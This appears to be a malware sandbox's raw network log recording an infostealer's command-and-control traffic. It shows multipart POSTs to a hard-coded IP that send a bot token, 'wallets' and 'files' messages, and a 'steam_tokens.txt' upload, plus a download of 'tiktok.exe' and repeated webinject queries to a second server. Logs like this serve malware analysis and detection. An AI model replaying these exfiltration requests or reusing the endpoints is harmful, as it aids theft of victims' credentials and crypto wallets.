Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 2d 2d 0d 0a Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="message"wallets------CBKJEGCBKKJECBGCGDBA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFIDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file"------HJDBFBKKJDHJKECBGDAK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.172.128.76Content-Length: 150547Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"her7h48r------FCAFIJJJKEGIECAKKEHI--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
